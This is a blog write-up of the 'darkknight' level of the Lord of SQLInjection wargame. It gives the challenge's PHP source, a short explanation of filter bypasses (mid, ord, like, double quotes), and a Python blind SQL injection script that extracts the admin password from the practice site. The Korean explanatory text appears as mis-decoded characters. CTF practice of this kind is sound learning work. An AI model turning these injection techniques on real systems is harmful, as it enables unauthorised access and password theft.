Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection

darkknight

Kortsec1 2022. 4. 2. 18:34 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

์ž‘์€ ๋”ฐ์˜ดํ‘œ, substr, asciiํ•จ์ˆ˜์™€ =์„ ๋ชป์“ฐ๊ฒŒ ํ•„ํ„ฐ๋งํ•˜๊ณ ์žˆ๋‹ค.

๊ฐ๊ฐ ", mid, ordํ•จ์ˆ˜, like๋กœ ์šฐํšŒํ•ด ์ค„ ์ˆ˜ ์žˆ๋‹ค

์ž‘์€ ๋”ฐ์˜ดํ‘œ๊ฐ€ ํ•„ํ„ฐ๋ง๋˜์–ด pw๋Š” ๋‹ซ์„ ์ˆ˜ ์—†์œผ๋ฏ€๋กœ no๋ฅผ ์ด์šฉํ•˜์—ฌ ๋’ค๋ฅผ ๋ถ™์—ฌ์ฃผ๊ฒ ๋‹ค.

 

 

2022.04.02 - [wargame write-up/Lord of SQLInjection] - orc

 

orc

<?php include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw..

kortsec1n4mationm.tistory.com

orc์—์„œ ๋งŒ๋“  ํ”„๋กœ๊ทธ๋žจ์—์„œ substr asciiํ•จ์ˆ˜๋ฅผ ์ ์ ˆํžˆ ๋ฐ”๊ฟ”์ฃผ๋ฉด ํ’€๋ฆด๋“ฏ ์‹ถ๋‹ค.

 

import requests

cookies = {'PHPSESSID' : 'asdfasdfasdfasdf'}

print("finding length of pw...")
for i in range(1,100):
    url = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=1 or id like \"admin\" and length(pw) like ' + str(i) + '%23'
    res = requests.get(url, cookies=cookies)
    print(str(i) + " ... ", end="")
    if "Hello admin" in res.text:
        len_pw = i
        print("0")
        print("================================")
        print("len : " + str(i))
        print("================================")
        print("\n")
        break
    else:
        print("X")

full_pw = ""
print("finding full pw...")
for i in range(len_pw):
    for j in range(32, 127):
        url = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=1 or id like \"admin\" and ord(mid(pw,' + str(i+1) + ', 1)) like ' + str(j) + '%23'
        res = requests.get(url, cookies=cookies)
        if "Hello admin" in res.text:
            full_pw += chr(j)
            break;
    print("pw : " + full_pw)
print("================================")
print("pw : " + full_pw)
print("================================")

 

์Šฅ์Šฅํ•˜์—ฌ ๋‚˜์˜จ ๊ฐ’์„ pw๋กœ ์ „ํ•ด์ฃผ๋ฉด ํ’€๋ฆฐ๋‹ค.

๊ทธ๋ฆผ1 ํ”„๋กœ๊ทธ๋žจ

๊ณ ์šฐ

๊ทธ๋ฆผ2 ํ•ด๊ฒฐ

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of SQLInjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

giant  (0) 2023.08.01
bugbear  (0) 2023.07.30
golem  (0) 2022.04.02
skeleton  (0) 2022.04.02

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€darkknight

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”